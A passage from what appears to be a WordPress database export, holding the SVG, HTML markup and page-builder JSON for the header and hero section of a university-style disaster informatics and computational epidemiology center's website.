d=\"M1069.52,43.37l6.19-1.24,1.31-.45,4-.58,4.89.68c4-1.88,4-1.87,5.69,2.55a30,30,0,0,0,1.2,2.79c3,5.86,3,5.82,9.09,4.29a3.72,3.72,0,0,1,2.5.41c3.12,1.85,6,3.88,4,8.29-.1.22.29.67.43,1l2.85-3c.73,1.58.37,2.94.81,4a30.58,30.58,0,0,0,3,4.62l2.47-2.29c-3.46.83-3.83.5-2.92-2.82a26.61,26.61,0,0,1,1.57-4.47c2.18-4.49.74-6.59-4.32-6.9a8.72,8.72,0,0,1-5.34-2.22c-4.86-5-4.74-5.09-9.11-.07-.12.14-.42.13-1.17.33a57.38,57.38,0,0,0-3.49-6.28,6.85,6.85,0,0,0-3.62-2.76,29,29,0,0,0-7.28-.17,55.42,55.42,0,0,0-6,.93c-2.17.37-4.32,1-6.51,1.12-3.65.3-7.51-.39-10.39,2.76a37.77,37.77,0,0,1,5.49-1.08A22.42,22.42,0,0,1,1069.52,43.37Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.44,10.24l4-.6c2.61,0,5.23,0,7.84,0,1.34,0,3.05.26,3.94-.43,2.59-2,4.75-1.78,6.83.48,1.62,1.76,2.72,1.95,4-.46,1.51-2.85,4.23-3.12,7.28-1.54a6,6,0,0,0,4.36.58c6.13-2.4,12.57-2.23,18.93-2.74,3.46-.56,7-1.81,10.21.74l4.74.62a15.85,15.85,0,0,1,2.84-.56c4.63-.14,9.26-.19,13.88-.27-1.36-.58-2.7-1.6-4.09-1.68C696,4,689.76,4.05,683.55,3.68c-9.12-.54-18.06,0-26.8,2.94-2.41.79-5,1-6-2.06-1.81.4-3.33.78-4.87,1.06-4.51.82-9,1.63-13.55,2.35-.83.13-1.74-.35-2.6-.31-5.24.23-10.47.54-15.7.83.25.56.5,1.13.74,1.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n            <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-215 style-local-22-h27\">\n                    <!---->\n                    <!---->\n                    <h3 class=\"\">Center for Disaster Informatics &amp; Computational Epidemiology</h3>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Enabling Data-Driven Disaster Assessment &amp; Planning\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h35\" class=\"h-x-container style-864 style-local-22-h35 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-x-container-inner style-dynamic-22-h35-group style-864-spacing style-local-22-h35-spacing\"><span class=\"h-button__outer style-865-outer style-local-22-h36-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"https://gsudice.dataconn.net/?page_id=126\"  data-colibri-id=\"22-h36\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-865 style-local-22-h36 position-relative\"><!----><!----> <span>learn more</span></a>\n                    </span>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h29-outer\">\n            <div data-colibri-id=\"22-h29\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h29 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h30\" class=\"d-block style-221 style-local-22-h30 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h30-image\">\n                      <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h30-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_front_page','','publish','closed','closed','','22','','','2023-09-29 10:23:19','2023-09-29 14:23:19','',0,'https://gsudice.dataconn.net/?post_type=extb_post_header&#038;p=22',0,'extb_post_header','',0),(23,1,'2022-02-15 15:45:51','2022-02-15 15:45:51','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>&copy; 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics &amp; Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment &amp; Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"id\":\"22-h36\",\"parentId\":\"22-h35\",\"partialId\":22,\"styleRef\":865,\"type\":\"header\",\"props\":{\"text\":\"learn 